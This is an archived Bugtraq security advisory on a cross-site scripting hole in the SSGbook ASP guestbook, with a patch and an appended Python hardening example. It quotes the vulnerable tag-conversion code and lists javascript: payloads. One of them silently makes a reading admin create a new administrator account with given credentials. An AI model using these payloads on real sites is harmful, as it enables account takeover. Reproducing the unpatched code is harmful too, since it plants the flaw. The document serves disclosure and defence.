[27342] in bugtraq
SSGbook (ASP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Oct 8 13:51:25 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 08 Oct 2002 19:31:54 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com>
Information :
°°°°°°°°°°°°°°
Product : SSGbook
Language : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting
PHP Code / location :
°°°°°°°°°°°°°°°°°°°°°
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
----------------- config.asp ----------------------
Exploit :
°°°°°°°°°
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]
e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
Adds an admin if an admin reads it. Login : Pom, Password : turlututu
Patch :
°°°°°°°
In config.asp :
Add this line :
strOutput = Replace(strOutput, chr(34), "&quot;")
after
----------------------------------------------
strOutput = Replace(strOutput, "<", "&lt;")
strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------
And replace these lines :
------------------------------------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
------------------------------------------------
by :
------------------------------------------------
fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
------------------------------------------------
More details in French :
http://www.frog-man.org/tutos/SSGbook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
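As an added example (not SSGbook's code and not the author's patch), the following Python re-implements the [img]/[image] BBCode expansion described above with the two controls the patch introduces: HTML-escape the entry before any tag expansion, and only expand a tag whose URL begins with an allowed scheme. The names `render_post`, `ALLOWED_SCHEMES` and `_IMG_RE` are assumptions, and allowing `https://` alongside the patch's `http://` is an assumption as well.

```python
import html
import re

# Added example, not SSGbook's own code: a hardened version of the
# [img]/[image] BBCode expansion from the advisory. The patch requires the
# URL to start with "http://"; https:// is accepted here as an assumption.
ALLOWED_SCHEMES = ("http://", "https://")

# One BBCode pair: [img]...[/img], [image=left]...[/image=left], etc.
# The close tag must repeat the open tag's name and its =left/=right suffix.
_IMG_RE = re.compile(
    r"\[(?P<tag>img|image)(?P<align>(?:=(?:left|right))?)\]"
    r"(?P<url>.*?)"
    r"\[/(?P=tag)(?P=align)\]",
    re.IGNORECASE | re.DOTALL,
)


def _expand(m: re.Match) -> str:
    # m.group("url") was already HTML-escaped by render_post, so a quote in the
    # URL is &quot; and cannot terminate the src attribute.
    url = m.group("url").strip()
    # Scheme allow-list: a javascript: URL (in any case) never becomes <img src>.
    if not url.lower().startswith(ALLOWED_SCHEMES):
        return m.group(0)  # leave the BBCode as inert, visible text
    align = m.group("align")[1:].lower()  # "" or "left"/"right"
    attrs = f' align="{align}" id="{align}"' if align else ""
    return f'<img src="{url}"{attrs} border="0">'


def render_post(text: str) -> str:
    """Convert a guestbook entry to HTML: escape first, expand [img] second."""
    # Same order as the patched config.asp: <, > and " are neutralised before
    # the tag converter runs, so only the converter itself can emit markup.
    escaped = html.escape(text, quote=True)
    return _IMG_RE.sub(_expand, escaped)


if __name__ == "__main__":
    # Constructed inputs: a normal image and the javascript: form from the advisory.
    for entry in ("[img]http://example.com/a.gif[/img]",
                  "[image]javascript:{SCRIPT}[/image]"):
        print(render_post(entry))
```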